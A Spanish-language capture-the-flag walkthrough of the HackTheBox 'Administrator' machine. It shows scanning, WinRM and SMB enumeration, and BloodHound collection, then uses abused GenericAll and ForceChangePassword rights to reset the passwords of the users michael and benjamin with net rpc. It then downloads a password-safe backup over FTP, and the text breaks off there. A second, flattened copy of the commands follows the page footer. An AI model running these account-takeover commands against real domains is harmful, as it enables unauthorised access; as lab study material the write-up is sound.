HackTheBox Administrator

Machine Information As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Username: Olivia Password: ichliebedich

❯ nmap -sS -Pn -n -vvv --open --min-rate 5000 10.10.11.42 -oG port

PORT     STATE SERVICE          REASON
21/tcp   open  ftp              syn-ack ttl 127
53/tcp   open  domain           syn-ack ttl 127
88/tcp   open  kerberos-sec     syn-ack ttl 127
135/tcp  open  msrpc            syn-ack ttl 127
139/tcp  open  netbios-ssn      syn-ack ttl 127
389/tcp  open  ldap             syn-ack ttl 127
445/tcp  open  microsoft-ds     syn-ack ttl 127
464/tcp  open  kpasswd5         syn-ack ttl 127
593/tcp  open  http-rpc-epmap   syn-ack ttl 127
636/tcp  open  ldapssl          syn-ack ttl 127
3268/tcp open  globalcatLDAP    syn-ack ttl 127
3269/tcp open  globalcatLDAPssl syn-ack ttl 127

❯ nmap -sCV -p21,53,88,135,139,389,445,464,593,636,3268,3269 10.10.11.42 -oN target.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-25 16:43 EDT
Nmap scan report for 10.10.11.42
Host is up (0.037s latency).

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-25 19:47:18Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-04-25T19:47:23
|_  start_date: N/A
|_clock-skew: -55m49s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Puertos abiertos con su version y servicio que corren.

❯ ldapsearch -x -H ldap://10.10.11.42 -s base | grep 'ServiceName'
ldapServiceName: administrator.htb:dc$@ADMINISTRATOR.HTB
dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN

Verificamos el dominio y los agregamos al etc/hosts.

nxc

❯ nxc winrm 10.10.11.42 -u 'Olivia' -p 'ichliebedich'  2>/dev/null
WINRM       10.10.11.42     5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
WINRM       10.10.11.42     5985   DC               [+] administrator.htb\Olivia:ichliebedich (Pwn3d!)

Este comando verifica si las credenciales proporcionadas permiten autenticar correctamente a través de WinRM, un protocolo que permite la administración remota de sistemas Windows.

❯ evil-winrm -i 10.10.11.42 -u 'Olivia' -p 'ichliebedich'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\olivia\Documents> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 10.10.11.42
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : 10.10.10.2
*Evil-WinRM* PS C:\Users\olivia\Documents>

Nos conectamos y estamos dentro.

❯ nxc smb 10.10.11.42 -u 'Olivia' -p 'ichliebedich' --users 2>/dev/null
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.42     445    DC               [+] administrator.htb\Olivia:ichliebedich 
SMB         10.10.11.42     445    DC               -Username-                    -Last PW Set-       -BadPW- -Description-                                   
SMB         10.10.11.42     445    DC               Administrator                 2024-10-22 18:59:36 0       Built-in account for administering the computer/domain
SMB         10.10.11.42     445    DC               Guest                         <never>             0       Built-in account for guest access to the computer/domain
SMB         10.10.11.42     445    DC               krbtgt                        2024-10-04 19:53:28 0       Key Distribution Center Service Account 
SMB         10.10.11.42     445    DC               olivia                        2024-10-06 01:22:48 0        
SMB         10.10.11.42     445    DC               michael                       2025-04-24 01:58:57 0        
SMB         10.10.11.42     445    DC               benjamin                      2025-04-24 02:02:27 0        
SMB         10.10.11.42     445    DC               emily                         2024-10-30 23:40:02 0        
SMB         10.10.11.42     445    DC               ethan                         2024-10-12 20:52:14 0        
SMB         10.10.11.42     445    DC               alexander                     2024-10-31 00:18:04 0        
SMB         10.10.11.42     445    DC               emma                          2024-10-31 00:18:35 0        
SMB         10.10.11.42     445    DC               [*] Enumerated 10 local users: ADMINISTRATOR

Con este comando estámos preguntando al servidor SMB: Con este usuario y contraseña, ¿me puedes decir qué usuarios hay en el sistema?"

❯ bloodhound-python -u 'olivia' -p 'ichliebedich' -c All --zip -ns 10.10.11.42 -d administrator.htb
INFO: Found AD domain: administrator.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
INFO: Done in 00M 10S
INFO: Compressing output into 20250426004656_bloodhound.zip

Este comando usa la herramienta bloodhound-python, que sirve para recolectar información de Active Directory (AD) con el fin de analizarla visualmente después en la herramienta BloodHound.

Actualmente somos olivia, y observamos que olivia tiene derecho Generic All sobre el usuario Michael.

❯ net rpc password "michael" "newP@ssword2022" -U "administrator.htb"/"olivia"%"ichliebedich" -S "10.10.11.42"
“Hola, soy olivia, tengo permisos. Quiero cambiar la contraseña del usuario michael a newP@ssword2022.”

🔐 Como olivia tiene privilegios suficientes (por ejemplo, es admin del dominio o tiene permisos de delegación), el cambio de contraseña se realiza sin problema.

❯ evil-winrm -i 10.10.11.42 -u 'michael' -p 'newP@ssword2022'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\michael\Documents> whoami
administrator\michael
*Evil-WinRM* PS C:\Users\michael\Documents>

Observamos que nos podemos conectar como michael le hemos cambiado la contraseña.

Ahora que ya tenemos credenciales validas para el usuario michael, observamos que michael tiene permisos de ForceChangePassword sobre Benjami, en español le podemos cambiar la contraseña al usario benjami.

❯ net rpc password "benjamin" "newP@ssword2022" -U "administrator.htb"/"michael"%"newP@ssword2022" -S "10.10.11.42"

Le cambiamos la contraseña al usuario benjamin.

FTP

❯ ftp 10.10.11.42
Connected to 10.10.11.42.
220 Microsoft FTP Service
Name (10.10.11.42:kali): benjamin
331 Password required
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||51408|)
125 Data connection already open; Transfer starting.
10-05-24  09:13AM                  952 Backup.psafe3
226 Transfer complete.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||51411|)
125 Data connection already open; Transfer starting.
100% |*****************************************************************************************************************|   952       25.95 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (25.73 KiB/s)
ftp>

Ahora con las credenciales del usuario benjamin nos conectamos por FTP y nos descargamos, lo que encontramos por aca.

AnteriorACTIVE DIRECTORY SiguienteHackTheBox Cicada

Última actualización hace 14 horas

❯ nmap -sS -Pn -n -vvv --open --min-rate 5000 10.10.11.42 -oG port PORT STATE SERVICE REASON 21/tcp open ftp syn-ack ttl 127 53/tcp open domain syn-ack ttl 127 88/tcp open kerberos-sec syn-ack ttl 127 135/tcp open msrpc syn-ack ttl 127 139/tcp open netbios-ssn syn-ack ttl 127 389/tcp open ldap syn-ack ttl 127 445/tcp open microsoft-ds syn-ack ttl 127 464/tcp open kpasswd5 syn-ack ttl 127 593/tcp open http-rpc-epmap syn-ack ttl 127 636/tcp open ldapssl syn-ack ttl 127 3268/tcp open globalcatLDAP syn-ack ttl 127 3269/tcp open globalcatLDAPssl syn-ack ttl 127

❯ nmap -sCV -p21,53,88,135,139,389,445,464,593,636,3268,3269 10.10.11.42 -oN target.txt Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-25 16:43 EDT Nmap scan report for 10.10.11.42 Host is up (0.037s latency). PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-syst: |_ SYST: Windows_NT 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-25 19:47:18Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2025-04-25T19:47:23 |_ start_date: N/A |_clock-skew: -55m49s | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required

❯ ldapsearch -x -H ldap://10.10.11.42 -s base | grep 'ServiceName' ldapServiceName: administrator.htb:dc$@ADMINISTRATOR.HTB dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN

❯ nxc winrm 10.10.11.42 -u 'Olivia' -p 'ichliebedich' 2>/dev/null WINRM 10.10.11.42 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb) WINRM 10.10.11.42 5985 DC [+] administrator.htb\Olivia:ichliebedich (Pwn3d!)

❯ evil-winrm -i 10.10.11.42 -u 'Olivia' -p 'ichliebedich' Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\olivia\Documents> ipconfig Windows IP Configuration Ethernet adapter Ethernet0: Connection-specific DNS Suffix . : IPv4 Address. . . . . . . . . . . : 10.10.11.42 Subnet Mask . . . . . . . . . . . : 255.255.254.0 Default Gateway . . . . . . . . . : 10.10.10.2 *Evil-WinRM* PS C:\Users\olivia\Documents>

❯ nxc smb 10.10.11.42 -u 'Olivia' -p 'ichliebedich' --users 2>/dev/null SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False) SMB 10.10.11.42 445 DC [+] administrator.htb\Olivia:ichliebedich SMB 10.10.11.42 445 DC -Username- -Last PW Set- -BadPW- -Description- SMB 10.10.11.42 445 DC Administrator 2024-10-22 18:59:36 0 Built-in account for administering the computer/domain SMB 10.10.11.42 445 DC Guest <never> 0 Built-in account for guest access to the computer/domain SMB 10.10.11.42 445 DC krbtgt 2024-10-04 19:53:28 0 Key Distribution Center Service Account SMB 10.10.11.42 445 DC olivia 2024-10-06 01:22:48 0 SMB 10.10.11.42 445 DC michael 2025-04-24 01:58:57 0 SMB 10.10.11.42 445 DC benjamin 2025-04-24 02:02:27 0 SMB 10.10.11.42 445 DC emily 2024-10-30 23:40:02 0 SMB 10.10.11.42 445 DC ethan 2024-10-12 20:52:14 0 SMB 10.10.11.42 445 DC alexander 2024-10-31 00:18:04 0 SMB 10.10.11.42 445 DC emma 2024-10-31 00:18:35 0 SMB 10.10.11.42 445 DC [*] Enumerated 10 local users: ADMINISTRATOR

❯ bloodhound-python -u 'olivia' -p 'ichliebedich' -c All --zip -ns 10.10.11.42 -d administrator.htb INFO: Found AD domain: administrator.htb INFO: Getting TGT for user WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) INFO: Connecting to LDAP server: dc.administrator.htb INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 1 computers INFO: Connecting to LDAP server: dc.administrator.htb INFO: Found 11 users INFO: Found 53 groups INFO: Found 2 gpos INFO: Found 1 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: dc.administrator.htb INFO: Done in 00M 10S INFO: Compressing output into 20250426004656_bloodhound.zip

❯ evil-winrm -i 10.10.11.42 -u 'michael' -p 'newP@ssword2022' Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\michael\Documents> whoami administrator\michael *Evil-WinRM* PS C:\Users\michael\Documents>

FTP

❯ ftp 10.10.11.42
Connected to 10.10.11.42.
220 Microsoft FTP Service
Name (10.10.11.42:kali): benjamin
331 Password required
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||51408|)
125 Data connection already open; Transfer starting.
10-05-24  09:13AM                  952 Backup.psafe3
226 Transfer complete.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||51411|)
125 Data connection already open; Transfer starting.
100% |*****************************************************************************************************************|   952       25.95 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (25.73 KiB/s)
ftp>

Ahora con las credenciales del usuario benjamin nos conectamos por FTP y nos descargamos, lo que encontramos por aca.